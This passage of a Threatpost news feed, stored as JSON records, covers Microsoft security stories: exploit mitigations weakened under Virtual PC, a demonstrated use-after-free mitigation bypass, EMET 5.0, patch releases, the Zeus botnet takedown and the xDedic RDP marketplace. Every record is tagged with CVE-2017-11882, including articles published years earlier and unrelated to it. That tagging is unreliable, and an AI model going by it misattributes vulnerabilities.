The protection mechanisms that are present in the Windows kernel are rendered less effective inside of a virtual machine as opposed to a physical machine. There is no vulnerability introduced, just a loss of certain security protection mechanisms,\u201d Microsoft\u2019s Paul Cooke wrote in a blog post at the time.\n\nSoftware companies large and small make these kinds of judgments on a daily basis during both the development process and the life span of a deployed product. The mere presence of a bug or vulnerability in an application doesn\u2019t mean that an attacker could necessarily use the flaw to compromise a system running the software. Plenty of bugs just cause the software to act flaky or become unstable or hang without offering an attacker any inroads into the machine.\n\nSo fixing these problems isn\u2019t always a top priority for software makers, especially if they\u2019re on tight deadlines or strict budgets. And there\u2019s always the compatibility problem to take into account: If a patch breaks some other service or feature in the application, then it may just infuriate users. So maybe all of that customer aggravation isn\u2019t worth it.\n\nThe difference in this case, experts say, is that the Virtual PC vulnerability is the symptom of a larger problem lurking beneath the surface: assuming that protections such as ASLR, DEP and SafeSEH will always be around to save us.\n\n\u201cWe\u2019re less worried about this particular vulnerability than we are about the now-exposed (incorrect) assumption that various security mechanisms will always be in place. It\u2019s obvious that a complete re-calibration of exploit potential for uncategorized bugs will become necessary if vulnerabilities like the one described here remain in our fielded systems. 
Not so good for Windows 7,\u201d Gary McGraw of Cigital and Ivan Arce of Core Security wrote in an [analysis of the Virtual PC situation](<http://www.informit.com/articles/article.aspx?p=1588145>) for InformIT.\n\n\u201cIn our view, design and architecture decisions made for Virtual PC completely invalidate some basic assumptions about processes in modern Windows operating systems. Like falling dominoes, this in turn invalidates almost all anti-exploit mechanisms that Microsoft has built into their OS over the past decade, which then topples over and turns an entire class of bugs deemed un-exploitable on non-virtualized systems into potential vulnerabilities on virtualized systems. Backwards time warp and a table full of fallen dominoes,\u201d they wrote.\n\nThis may seem an isolated, extreme case, but there have been other examples in the last few months of the same kind of assumptions being ground to pieces under the wheels of logic and ingenuity. After the disclosure of the high-profile attack on Google and other big companies last fall, word quickly leaked out that the flaw used to compromise the search giant was an unpatched problem in Internet Explorer. Several experts said the problem couldn\u2019t be exploited on IE 8 on Windows 7 because of the memory protections that Microsoft had added.\n\nWithin a few days, that was proven false as researcher Dino Dai Zovi, followed by others, used the [same exploit on a Windows 7 machine running IE 8](<https://threatpost.com/memory-protections-advance-exploits-stay-step-ahead-030810/>), a technique he demonstrated live at the RSA Conference in March. 
The point, Dai Zovi and others maintain, is that exploit mitigations are just that: mitigations.\n\n\u201cAttack mitigation takes the universe of exploit techniques and narrows it down,\u201d Dai Zovi said during his RSA talk. \u201cBut preventing the introduction of malicious code isn\u2019t enough to prevent malicious computations.\u201d\n\nThat\u2019s a point that\u2019s becoming ever clearer.\n\n\u201cMicrosoft claims that the Virtual PC problem \u2018isn\u2019t a vulnerability _per se_\u2019 because the problem described only affects \u201csecurity-in-depth\u201d mechanisms and attackers would need to find and exploit an actual implementation bug to leverage it. Even if Microsoft is right on that count (which we don\u2019t think they are), they are ignoring the bigger issue of assumptions. Bugs previously deemed non-exploitable for anything other than crashing systems are now potentially exploitable under a virtualized OS. Because of the way bugs are slated for mitigation in the real world, a majority of those bugs remain unpatched \u2014 a problem of prioritization and the enormity of the bug pile in applications,\u201d McGraw and Arce conclude.\n", "cvss3": {}, "published": "2010-05-03T19:10:03", "type": "threatpost", "title": "How Assumptions May Be Making Us All Less Secure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:37:06", "id": "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "href": "https://threatpost.com/how-assumptions-may-be-making-us-all-less-secure-050310/73913/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:31", "description": "For a long time, Microsoft\u2019s monthly Patch Tuesday security bulletins have periodically addressed use-after-free vulnerabilities, the latest class of memory corruption bugs that have already found their way into a number of targeted attacks.\n\nMicrosoft 
has implemented mitigations to address memory-related vulnerabilities that afford successful attackers control over the underlying computer. Most notably, Microsoft has stood behind its Enhanced Mitigation Experience Toolkit, or EMET, suggesting it on several occasions as a temporary mitigation for a vulnerability until the company could push out a patch to users.\n\nMost recently, Microsoft brought new memory defenses to the browser, loading Internet Explorer with two new protections called Heap Isolation and Delayed Free, both of which take steps inside IE to frustrate and deny the execution of malicious code.\n\nResearchers have had a growing interest in [bypassing EMET and memory protections](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) for some time, with some [successful bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) disclosed and ultimately addressed by Microsoft. And until the [Operation Snowman attacks](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>), they were exclusively the realm of white hats\u2014as far as we know publicly.\n\nAs with the [EMET protections](<http://threatpost.com/pwn2own-paying-150000-grand-prize-for-microsoft-emet-bypass/104015>), Heap Isolation and Delayed Free were bound to attract some attention and last week at ShmooCon, a hacker conference in Washington, D.C., Bromium Labs principal security researcher Jared DeMott successfully demonstrated a bypass for both.\n\nDeMott\u2019s bypass relies on what he termed a weakness in Microsoft\u2019s approach with the new protections. 
With Heap Isolation, a new heap is created housing sensitive internal IE objects, while objects such as JavaScript likely to be targeted remain in the default heap, he said.\n\n\u201cThus if a UaF condition appears, the attacker should not be able to replace the memory of the dangling pointer with malicious data,\u201d he wrote in a [report](<http://labs.bromium.com/2015/01/17/use-after-free-new-protections-and-how-to-defeat-them/>) published this week. This separation of good and bad data, however, isn\u2019t realistic given the complexity of code and objects. Delayed Free then kicks in by delaying the release of an object to memory until there are no references to the object on the stack and 100,000 bytes are waiting to be freed, DeMott said.\n\nTaking advantage of these conditions, DeMott\u2019s bypass works through the use of what he calls a \u201clong-lived dangling pointer.\u201d\n\n\u201cIf an attacker can locate a UaF bug that involves code that maintains a heap reference to a dangling pointer, the conditions to actually free the object under the deferred free protection can be met (no stack references or call chain eventually unwinds),\u201d DeMott said. 
\u201cAnd finding useful objects in either playground to replace the original turns out not to be that difficult either.\u201d\n\n[DeMott\u2019s bypass is a Python script](<https://bromiumlabs.files.wordpress.com/2015/01/allocationinformation-py.zip>) which searches IE for all objects, sizes and whether an object is allocated to the default or isolated heap.\n\n\u201cThis information can be used to help locate useful objects to attack either heap,\u201d he wrote. \u201cAnd with a memory garbage collection process known as coalescing the replacement object does not even have to be the same size as the original object.\u201d\n\nDeMott said an attack would be similar to other client-side attacks. A victim would have to be lured to a website via phishing or a watering hole attack and be infected with the exploit.\n\n\u201cIf you have a working UaF bug, you have to make sure it\u2019s of this long-lived type and can basically upgrade it to an existing attack to bypass these mitigations,\u201d DeMott told Threatpost. \u201cThere\u2019s no secret sauce, like every attack, it just depends on a good bug.\u201d\n\nDeMott said he expects use-after-free to be the next iteration of memory corruption attacks.\n\n\u201cThere\u2019s always a need [for attackers] to innovate,\u201d DeMott said, pointing out that Microsoft deployed ASLR and DEP in response to years of buffer overflow and heap spray attacks, only to be thwarted by attackers with use-after-free vulnerabilities. 
\u201cIt\u2019s starting to happen, it\u2019s coming if it\u2019s not already here.\u201d\n", "cvss3": {}, "published": "2015-01-21T11:40:11", "type": "threatpost", "title": "Bypass Demonstrated for Microsoft Use-After-Free Mitigation in IE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-01-21T16:40:11", "id": "THREATPOST:14FF20625850B129B7F957E8393339F1", "href": "https://threatpost.com/bypass-demonstrated-for-microsoft-use-after-free-mitigation-in-ie/110570/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:15", "description": "Microsoft today re-released [security bulletin MS14-045](<http://threatpost.com/microsoft-yet-to-deliver-fix-for-faulty-patch-tuesday-update/107809>), which was pulled shortly after the [August Patch Tuesday updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>) because a number of users reported crashes and blue screens. The patch was removed from Windows Update on Aug. 15, three days after it was released as part of Microsoft\u2019s monthly patch cycle.\n\n\u201cAs soon as we became aware of some problems, we began a review and then immediately pulled the problematic updates, making these unavailable to download,\u201d said Tracey Pretorius, director, Trustworthy Computing at Microsoft. \u201cWe then began working on a plan to rerelease the affected updates.\u201d\n\n[MS14-045](<https://technet.microsoft.com/en-us/library/security/ms14-045.aspx>) patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit. Successful exploits could have led to an elevation of privileges on a compromised Windows machine.\n\nMicrosoft said at the time that a font issue patched in the update was the culprit causing the reported system crashes. 
Microsoft said that only a small number of computers were affected. There were other issues with the bulletin, the most serious causing systems to crash and render a 0x50 Stop error message after installation. Users were also seeing \u201cFile in Use\u201d error messages because of the font issue in question.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows. Windows Update users will automatically get the patch; otherwise, Microsoft urges users to install the update.\n\nThis month\u2019s updates had a distinct IE feel to them, with another cumulative update patching 26 vulnerabilities in Microsoft\u2019s flagship browser, including a publicly reported vulnerability that is likely being exploited in the wild. All 26 vulnerabilities were rated critical and could be remotely exploited.\n\nThe update came on the heels of an announcement at the start of the month alerting users that Microsoft would, in 18 months, no longer support older versions of the browser. With a rash of zero-days and high profile exploits targeting older versions of IE, such as 6, 7 and 8, Microsoft made it clear that users should use only a current browser with modern memory exploit mitigations built in.\n\nMicrosoft also announced it would be [blocking older ActiveX controls in Internet Explorer](<http://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672>), starting with out of date versions of Java, another platform heavily targeted by hackers.\n\nThe next scheduled Patch Tuesday security bulletins release is set for Sept. 
9.\n", "cvss3": {}, "published": "2014-08-27T14:08:58", "type": "threatpost", "title": "Microsoft Re-Releases Broken Security Patch MS14-045", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-09-04T12:04:44", "id": "THREATPOST:2DAD0426512A1257D3D75569F282640E", "href": "https://threatpost.com/microsoft-fixes-broken-security-patch-ms14-045/107953/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:24", "description": "The latest version of Microsoft\u2019s freely available stopgap against zero-day exploits was released today with two new exploit mitigations and a batch of new configuration options.\n\nThe update to Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, comes six months after a [technical preview of EMET 5.0](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) was released in February during the RSA Conference. At that time Microsoft was touting new plug-in controls and memory protections, both of which have been rolled into [EMET 5.0](<http://blogs.technet.com/b/msrc/archive/2014/07/30/general-availability-for-enhanced-mitigation-experience-toolkit-emet-5-0.aspx>).\n\nThe first new mitigation is called Attack Surface Reduction (ASR). The mitigation allows Windows administrators to determine when\u2014or if\u2014plug-ins such as Java or Adobe Flash run at all on a Windows computer. Java and Flash, for example, have been favorite targets of hackers. 
Many advanced attacks exploit vulnerabilities in either platform, giving attackers an initial foothold on a system that can then be leveraged for further system and network access.\n\nWith ASR, administrators are able to, for example, allow Java plug-ins on internal websites, while blocking them to the open Internet. They can also block Office applications, for example, from loading Flash in a Word or Excel document, but allow it in the browser.\n\n\u201cWe heard from customers that they wanted more control over which programs and in which scenarios these plugins can be loaded. We initially released a Fix It tool last year to disable the Java plugin entirely in Internet Explorer and that helped people,\u201d said Jonathan Ness, principal security development manager for the Microsoft Security Response Center. \u201cBut customers told us that they still needed Java for their line-of-business applications running on their local intranet and were looking for a way to block Java and other plugins from loading on the wider untrusted Internet.\u201d\n\nMicrosoft has been vocal about recommending EMET as a temporary mitigation for zero-day attacks against previously unreported vulnerabilities. EMET includes a dozen mitigations that block exploit attempts targeting memory vulnerabilities. Most of the mitigations are for return-oriented programming (ROP) exploits, in addition to memory-based mitigations such as ASLR, DEP, heap spray and SEHOP protections. 
EMET is not meant as a permanent fix, but only as a stopgap until a patch is ready for rollout.\n\nThe other new mitigation in EMET 5.0 is called Export Address Table Filtering Plus (EAF+), which introduces two new methods aimed at disrupting advanced attacks, Microsoft said.\n\n\u201cFor example, EAF+ adds a new \u2018page guard\u2019 protection to help prevent memory read operations, commonly used as information leaks to build exploitations,\u201d Microsoft said in a statement.\n\n\u201cIt\u2019s the way EMET blocks common exploit techniques, common shell code techniques. The engineers building EMET are the same engineers in the security response center that respond to attacks in the wild against our software and these guys are always studying new attack techniques that show up in real-world exploits,\u201d Ness said. \u201cEAF+ amplifies the scope and robustness of EAF. It blocks new kinds of exploit techniques by performing additional integrity checks and preventing certain memory read operations used as \u2018read anywhere\u2019 primitives in recent exploits.\u201d\n\nMicrosoft has also tweaked the configuration options in EMET 5.0 allowing admins to further configure how mitigations protect applications in a particular IT environment.\n\n\u201cUsers can configure which specific memory addresses to protect with the HeapSpray Allocation mitigation using EMET 5.0,\u201d Microsoft said. \u201cWe continue to provide smart defaults for many of the most common applications used by our customers.\u201d\n\nMicrosoft said it has also simplified the way EMET configuration changes can be pushed via Group Policy in Active Directory.\n\n\u201cThey will no longer need to refresh the EMET configuration on each host or wait for an application refresh to make configuration changes to all hosts via group policy,\u201d Ness said. 
\u201cConfiguration changes will take effect right away with the addition of the EMET Service.\u201d\n\nMicrosoft has also added new services that help users monitor logs for suspicious activity, and has added improvements to its Certificate Trust feature, which lets users configure settings that block visits to websites with untrusted digital certificates.\n\n\u201cAll EMET users are going to benefit from the way we refactored many components of the EMET 5.0 engine to maximize application compatibility and reduce false positives, and from the work we did with popular anti-malware products to ensure application compatibility,\u201d Ness said.\n", "cvss3": {}, "published": "2014-07-31T14:41:35", "type": "threatpost", "title": "Microsoft Releases EMET 5.0 Exploit Mitigation Tool", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-06T21:06:00", "id": "THREATPOST:985009AC9680D632153D78707A8949EF", "href": "https://threatpost.com/microsoft-releases-new-version-of-emet-exploit-mitigation-tool/107549/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:54", "description": "Microsoft today provided its [Patch Tuesday advance notification](<https://technet.microsoft.com/en-us/library/security/MS14-NOV>), giving IT managers a heads-up about 16 bulletins that are scheduled to be delivered next week, including five rated critical for remote code execution and privilege escalation issues.\n\nThe heavy patch load is an anomaly for 2014, which has been relatively quiet. 
The last time Microsoft released anything approaching this many bulletins in one month was in September 2013.\n\n\u201cNext week will tell us how many CVEs are involved but suffice to say, this patch load will be a big impact to the enterprise,\u201d said Russ Ernst, director at Lumension.\n\nExpect another cumulative critical patch rollup for Internet Explorer and four other critical bulletins for Windows. Nine of the remaining bulletins are rated Important by Microsoft and two others Moderate.\n\nOffice software is in the crosshairs of the moderate bulletins. Microsoft said bulletins are on the way for Office 2007 SP3, Microsoft Word Viewer and Office Compatibility Pack SP3.\n\nMicrosoft is also expected to patch vulnerabilities in Exchange Server 2007, 2010 and 2013, as well as the .NET development framework. None of those are rated critical, likely meaning an attacker would require local access in order to exploit the security issues.\n", "cvss3": {}, "published": "2014-11-06T14:34:02", "type": "threatpost", "title": "November 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-06T19:34:02", "id": "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "href": "https://threatpost.com/microsoft-ready-with-16-patch-tuesday-bulletins-5-critical/109223/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:28", "description": "[](<https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/>)Microsoft has gone after another botnet, this time targeting some of the command-and-control infrastructure behind the Zeus network with a takedown effort that included seizing two IP addresses used for C&C servers and filing suit against 39 unnamed defendants. 
The action against Zeus is the latest in a string of such moves by Microsoft and some of its partners against the operators of botnets such as [Kelihos](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>) and [Waledac](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>).\n\nZeus is one of the more widespread and well-known pieces of malware to appear in the last five years and is among the new breed of tools that\u2019s sold in various forms to anyone who can pay the freight. The Zeus kit enables an attacker to monitor a user\u2019s actions on a compromised machine, steal credentials for online banking or other valuable sites and then rack up huge profits. Like other major botnets operating right now, the Zeus network is not one botnet but dozens and dozens of individual networks operated by various criminals around the world. \n\nMicrosoft\u2019s anti-Zeus operation resulted in the takedown of two C&C servers that are used in the global Zeus network, but the company\u2019s officials say they have no illusions that this move will cripple the entire Zeus system. \n\n\u201cWe don\u2019t expect this action to have wiped out every Zeus botnet operating in the world. However, together, we have proactively disrupted some of the most harmful botnets, and we expect this effort will significantly impact the cybercriminal underground for quite some time. Cybercriminals are in this for the money and this action was an unprecedented strike against the illicit infrastructure on which they rely. 
The operation will help further investigations against those responsible for the threat and help us better protect victims,\u201d Richard Domingues Boscovich, a senior attorney in Microsoft\u2019s Digital Crimes Unit, wrote in an analysis of the [Zeus botnet takedown](<http://blogs.technet.com/b/microsoft_blog/archive/2012/03/25/microsoft-and-financial-services-industry-leaders-target-cybercriminal-operations-from-zeus-botnets.aspx>).\n\nLast Monday, Microsoft [filed suit in the Eastern District of New York](<http://www.zeuslegalnotice.com/>) against the unnamed defendants, saying that they, using various aliases and handles, had operated the Zeus botnet. The company, along with the National Automated Clearing House Association, asked the court for permission to cut off the C&C infrastructure of Zeus and also asked that the case be temporarily sealed in order to preserve the element of surprise against the suspects. The court granted both requests, and on Friday officials from Microsoft, NACHA and the Financial Services Information Sharing Analysis Center went with U.S. Marshals to execute the seizure of the servers.\n\n\u201cOn March 23, Microsoft, FS-ISAC and NACHA \u2013 escorted by the U.S. Marshals \u2013 successfully executed a coordinated physical seizure of command and control servers in two hosting locations to seize and preserve valuable data and virtual evidence from the botnets for the case. We took down two IP addresses behind the Zeus \u2018command and control\u2019 structure. Microsoft also currently monitors 800 domains secured in the operation, which helps us to identify thousands of Zeus-infected computers,\u201d Boscovich said. \n\nThe botnets affected by the Zeus takedown action include some running the Ice-IX and SpyEye variants of the malware. 
The Zeus codebase has forked and evolved over time and some features of the once-competitive SpyEye toolkit were included in some versions recently.\n\nIn an interesting twist to the takedown, Microsoft and the other plaintiffs in the case decided to use the civil section of the RICO statute to go after the group of defendants, allowing them to group the alleged botnet controllers under the umbrella of one organized criminal enterprise. The statute typically is used in organized crime prosecutions, but the nature of the Zeus operation lent itself to the same kind of action.\n\n\u201cUpon information and belief, John Does 1-39 constitute a group of persons associated together for a common purpose of engaging in a course of conduct, as part of an ongoing organization, with the various associates functioning as a continuing unit. The Defendants\u2019 enterprise has a purpose, with relationships among those associated with the enterprise, and longevity sufficient to permit those associates to pursue the enterprise\u2019s purpose. Upon information and belief, Defendants John Doe 1, John Doe 2, and John Doe 3 conspired to, and did, form an associated in fact enterprise (herein after the \u201cZeus Racketeering Enterprise\u201d) with a common purpose of developing and operating a global credential stealing botnet operation as set forth in detail herein,\u201d the complaint filed against the botnet operators says. 
\n\n\u201cBoth the purpose of the Zeus Racketeering Enterprise and the relationship between the Defendants is proven by: (1) the consolidation of the original Zeus botnet and the SpyEye botnet; (2) the subsequent development and operation of the enhanced Ice-IX botnet; and (3) Defendants\u2019 respective and interrelated roles in the sale, operation of, and profiting from the Zeus Botnets in furtherance of Defendants\u2019 common financial interests.\u201d\n\nMicrosoft\u2019s Boscovich said the use of RICO was an important aspect of the case.\n\n\u201cIn criminal court cases, the RICO Act is often associated with cases against organized crime; the same is true in applying the civil section of the law to this case against what we believe is an organization of people behind the Zeus family of botnets. By incorporating the use of the RICO Act, we were able to pursue a consolidated civil case against everyone associated with the Zeus criminal operation, even if those involved in the \u2018organization\u2019 were not necessarily part of the core enterprise,\u201d he said.\n", "cvss3": {}, "published": "2012-03-26T12:05:14", "type": "threatpost", "title": "Microsoft, Financial Groups Execute Takedown of Zeus Botnet Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:34", "id": "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "href": "https://threatpost.com/microsoft-financial-groups-execute-takedown-zeus-botnet-servers-032612/76364/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:45", "description": "In the midst of a relatively light [Patch Tuesday](<https://threatpost.com/critical-ie-update-one-of-eight-microsoft-security-bulletins/113231>), Microsoft yesterday introduced an [extra measure of 
security](<http://blogs.windows.com/msedgedev/2015/06/09/http-strict-transport-security-comes-to-internet-explorer-11-on-windows-8-1-and-windows-7/>) for users running Internet Explorer 11 on Windows 7 and Windows 8.1 machines: HSTS.\n\nShort for HTTP Strict Transport Security, HSTS is a browser header that forces any sessions sent over HTTP to be sent instead over HTTPS based on a [preloaded list of sites](<https://hstspreload.appspot.com/>) supporting the protocol. HSTS encrypts communication to and from a website, and puts a dent in attempts to man-in-the-middle web sessions. According to OWASP, HSTS also stops attackers who use invalid digital certificates. The protocol denies users the ability to override invalid certificate messages. HSTS also protects users from HTTPS websites that also may include HTTP links or serve content unencrypted.\n\n[HSTS is already on by default](<https://support.microsoft.com/de-de/kb/3058515/en-us>) in Internet Explorer 11 available in the Windows 10 Insider Preview and the new Microsoft Edge expected to be available when Windows 10 releases later this year.\n\n\u201cSite developers can use HSTS policies to secure connections by opting in to an HSTS preload list, which registers websites to be hardcoded by Microsoft Edge, Internet Explorer, and other browsers to redirect HTTP traffic to HTTPS,\u201d said Kyle Pflug, program manager with the Microsoft Edge team. \u201cCommunications with these websites from the initial connection are automatically upgraded to be secure.\u201d\n\nMicrosoft is the last of the major browser vendors to add HSTS support. Google Chrome and Mozilla Firefox have supported HSTS since 2011, while Apple added it to Safari upon the release of version 10.9 of Mavericks.\n\nThe move comes on the heels of Microsoft in May bringing Perfect Forward Secrecy to Windows. Forward secrecy has of late been considered an essential security measure, especially for new applications. 
It ensures that new private keys are negotiated for every web session, meaning that if a key is ever compromised in the future, only that particular session will be at risk. In order to attack each session, each key would have to be attacked separately.\n\nThe addition of HSTS was included in a [cumulative update for Internet Explorer](<https://technet.microsoft.com/en-us/library/security/ms15-056.aspx>) released yesterday. The security bulletin included patches for two dozen vulnerabilities in the browser, most of which gave hackers the ability to remotely execute code on a compromised computer.\n\nHSTS also resolves Mixed Content attacks where insecure HTTP script is loaded from a site secured via a HTTPS connection.\n\n\u201cWhen we initially announced HSTS in Windows 10, we noted that mixed content is not supported on servers supporting HSTS. With today\u2019s updates, this is still the case in Microsoft Edge on Windows 10 \u2013 mixed content is always blocked on these servers,\u201d Pflug said. 
\u201cFor Internet Explorer 11 on Windows 10, Windows 8.1, and Windows 7, the Information bar will prompt the user to proceed in mixed content scenarios.\u201d\n", "cvss3": {}, "published": "2015-06-10T11:47:26", "type": "threatpost", "title": "Microsoft Brings HSTS to Windows 7 and 8.1", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-12T15:00:26", "id": "THREATPOST:0E875F36B37069C0CA4DC570FE3BD197", "href": "https://threatpost.com/microsoft-brings-hsts-to-windows-7-and-8-1/113258/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:22", "description": "Next week\u2019s Microsoft [Patch Tuesday security bulletins](<https://technet.microsoft.com/en-us/library/security/MS14-AUG>) will not only bring nine new security bulletins but also an update to Internet Explorer that blocks outdated ActiveX controls, starting with Java.\n\nNotifications will flag the older ActiveX controls and users will have the option to update the control immediately or run it for a particular instance. IT administrators will also have the option to configure the update to block older controls outright, and not just warn the user.\n\n\u201cBecause many ActiveX controls aren\u2019t automatically updated, they can become outdated as new versions are released,\u201d Microsoft said this week in its [announcement](<http://blogs.msdn.com/b/ie/archive/2014/08/06/internet-explorer-begins-blocking-out-of-date-activex-controls.aspx>). 
\u201cIt\u2019s very important that you keep your ActiveX controls up-to-date because malicious or compromised Web pages can target security flaws in outdated controls to collect information, install dangerous software, or let someone else control your computer remotely.\u201d\n\nThe update, called out-of-date ActiveX control blocking, displays a notification when the browser stops a website from loading an older control, while still allowing a user to interact with the rest of the page that is unaffected by the control. In addition to being able to update the control, IT shops can get an inventory of resident ActiveX controls via a new logging setting in Group Policy, Microsoft said.\n\nThe setting lists ActiveX controls that are permissible or will be blocked.\n\n\u201cCreating an inventory of ActiveX controls can also show which ActiveX controls are compatible with Enhanced Protected Mode, an Internet Explorer 11 security feature which provides additional protection against browser exploits\u2014but not all ActiveX controls are compatible with EPM, so this feature can help assess your organization\u2019s readiness for blocking out-of-date ActiveX controls and enabling EPM,\u201d Microsoft said.\n\nIn all, there are four new Group Policy settings related to the new update, including an enforced blocking setting that denies users the ability to use the \u201cRun This Time\u201d option in the notification. Admins can also create a list of top-level domains, host names or files where IE will not block outdated controls. Admins can also disable the feature altogether. The feature will also be off by default in the Local Intranet Zone and Trusted Sites Zone, allowing intranet sites and homegrown apps to run unimpeded inside the firewall.\n\nMicrosoft said next Tuesday\u2019s update will start with blocking older versions of Java, including Java SE 8 prior to update 11, Java SE 7 prior to update 65 and Java 6 prior to update 81. 
The update will be supported only on IE 8-11 on Windows 7 SP1, IE versions supported on Windows 8 and higher, and all Security Zones in the browser.\n\n\u201cWe know that many organizations still rely on the capabilities of ActiveX controls, but out-of-date ActiveX controls are a risk today,\u201d Microsoft said. \u201cBy helping consumers stay up-to-date\u2014and enabling IT to better manage ActiveX controls, including those that are compatible with Enhanced Protected Mode\u2014Microsoft is helping customers stay safer online.\u201d\n\nAs for the regularly scheduled Patch Tuesday security bulletins, two of the nine are rated critical, but three bulletins address remote code execution vulnerabilities. The two critical RCE bugs are in IE and Windows Media Center TV Pack for Vista, respectively, while the third, rated important likely because it requires user interaction, is in Office, specifically OneNote 2007 SP3.\n\nFour other important bulletins address elevation of privilege bugs in Microsoft SQL Server, Windows Server, and Microsoft SharePoint Server 2013.\n\nFinally, two security feature bypass vulnerabilities are also being patched in the .NET Framework and Windows Server.\n", "cvss3": {}, "published": "2014-08-08T11:55:44", "type": "threatpost", "title": "IE to Block Older ActiveX Controls, Starting with Java", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-08T15:55:44", "id": "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "href": "https://threatpost.com/ie-to-block-older-activex-controls-starting-with-java/107672/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:47", "description": "Nearly two-thirds of servers and PCs peddled on the xDedic underground marketplace belong to schools and universities, and most are based in the United States.\n\nIn a [recent analysis of 
xDedic](<https://www.flashpoint-intel.com/blog/cybercrime/xdedic-rdp-targets/>), Flashpoint found that besides the education sector, PCs and servers tied to healthcare and legal firms make up the bulk of the available vulnerable systems.\n\nXDedic is the largest of many platforms cybercriminals use to buy access to compromised servers and PCs that expose Microsoft\u2019s Remote Desktop Protocol (RDP). Using brute-force password attacks, the xDedic gang has grown the number of servers and PCs available for access to 85,000, up 10 percent from a year ago, according to Flashpoint.\n\nCriminals charge $50 to access the marketplace via Tor. Once in, criminals can browse thousands of compromised servers and PCs that can be accessed via a remote desktop session. Typically, access to a PC or server ranges from $7 to $15, according to Flashpoint.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/06225118/xDedic-Black-Market.jpg>)Once a hacker accesses a remote system they can steal data, move laterally within a corporate network or install malware.\n\n\u201cXDedic is the most prolific of these cybercriminal gangs. They have their own proprietary tools and techniques and have been prospering over the past year,\u201d said Vitali Kremez, senior intelligence analyst at Flashpoint.\n\nIn its research, Flashpoint said the United States, Germany, and Ukraine appear to be the most frequently targeted countries. The most exploited sectors are education, followed by healthcare, legal, aviation, and government. Least vulnerable to these types of attacks are the financial and telecom sectors.\n\n\u201cSchools appear to be the hardest hit because they have the least mature security departments and just can\u2019t effectively mitigate against these types of attacks,\u201d Kremez said. 
\u201cSchools also sometimes have large banks of RDP systems for students to access and play with.\u201d\n\nWhen it comes to being targeted by these types of attacks, Kremez said, the leading factors are a lack of computer hygiene, the number of external RDP servers available and systems that have notoriously bad passwords.\n\nOver the past year, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) has had its ups and downs. XDedic\u2019s original domain (xdedic[.]biz) disappeared shortly after [a Kaspersky Lab report](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/04/22070309/xDedic_marketplace_ENG.pdf>) (PDF) published in June described how xDedic provided a platform for the sale of compromised RDP servers. A month later in July, the [xDedic market](<https://threatpost.com/xdedic-scope-may-be-larger-than-originally-thought/118771/>) resurfaced, this time on a Tor domain, where it remains today.\n\n\u201cMicrosoft Windows is the most popular of the platforms targeted by these types of attacks,\u201d Kremez said. \u201cSimply put, Windows is the most prolific system out there. When a criminal is looking to find the biggest, easiest target with the highest probability of a successful infiltration, Windows is it.\u201d\n\nAs for Microsoft, Kremez said, it is constantly updating its RDP software to thwart bad guys. \u201cThe weakest link isn\u2019t software. It\u2019s the human factor and a failure to secure servers and client PCs to begin with. 
